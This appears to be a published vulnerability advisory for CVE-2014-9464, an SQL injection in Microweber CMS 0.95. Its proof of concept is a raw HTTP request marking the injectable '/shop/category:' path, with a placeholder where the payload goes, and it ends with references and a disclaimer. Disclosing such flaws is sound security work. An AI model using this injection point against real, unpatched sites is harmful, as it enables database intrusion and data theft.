# Exploit Title: SQL Injection in Microweber CMS 0.95 # Google Dork: N/A # Date: 12/16/2014 # Exploit Author: Pham Kien Cuong (cuong.k.pham@itas.vn) and ITAS Team (www.itas.vn) # Vendor Homepage: Microweber (https://microweber.com/) # Software Link: https://github.com/microweber/microweber # Version: 0.95 # Tested on: N/A # CVE : CVE-2014-9464 ::PROOF OF CONCEPT:: GET /shop/category:[SQL INJECTION HERE] HTTP/1.1 Host: target.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://target/shop Cookie: mw-time546209978=2015-01-05+05%3A19%3A53; PHPSESSID=48500cad98b9fa857b9d82216afe0275 Connection: keep-alive ::REFERENCE:: - http://www.itas.vn/news/itas-team-found-out-a-sql-injection-vulnerability-in-microweber-cms-69.html - https://www.youtube.com/watch?v=SSE8Xj_-QaQ - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9464 ::DISCLAIMER:: THE INFORMATION PRESENTED HEREIN ARE PROVIDED ?AS IS? WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO, ANY IMPLIED WARRANTIES AND MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE OR WARRANTIES OF QUALITY OR COMPLETENESS. THE INFORMATION PRESENTED HERE IS A SERVICE TO THE SECURITY COMMUNITY AND THE PRODUCT VENDORS. ANY APPLICATION OR DISTRIBUTION OF THIS INFORMATION CONSTITUTES ACCEPTANCE ACCEPTANCE AS IS, AND AT THE USER'S OWN RISK.